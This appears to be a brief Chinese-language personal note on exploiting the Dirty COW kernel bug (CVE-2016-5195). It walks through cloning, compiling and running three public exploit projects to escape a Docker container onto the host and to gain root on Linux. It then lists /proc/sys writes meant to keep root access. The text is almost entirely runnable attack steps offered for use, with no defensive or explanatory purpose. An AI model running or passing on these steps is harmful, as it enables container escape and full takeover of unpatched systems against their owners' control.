【笔记】CVE-2016-5195漏洞利用

前言

CVE-2016-5195漏洞利用

Docker容器逃逸

• 通过scumjr/dirtycow-vdso实现由内核引起的Docker容器逃逸漏洞利用

下载项目

git clone https://github.com/scumjr/dirtycow-vdso.git
cd dirtycow-vdso

下载依赖

Debian

apt install nasm

编译exp

make

执行exp

./0xdeadbeef

• 此时执行的命令，在真机上也会被执行

Linux提权

• 利用gbonacini/CVE-2016-5195的DirtyCow脏牛项目，实现Linux提权

下载项目

git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195

编译

make

漏洞利用

./dcow

提权

su root

Linux提权

• 利用sqlnetcat/dirtycow-mem的脏牛项目，实现Linux提权

下载项目

git clone https://github.com/sqlnetcat/dirtycow-mem.git
cd dirtycow-mem

编译项目

gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread

漏洞利用

./dirtycow-mem

保持root权限

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic
echo 1 > /proc/sys/kernel/panic_on_oops
echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi
echo 1 > /proc/sys/kernel/panic_on_io_nmi
echo 1 > /proc/sys/kernel/panic_on_warn

完成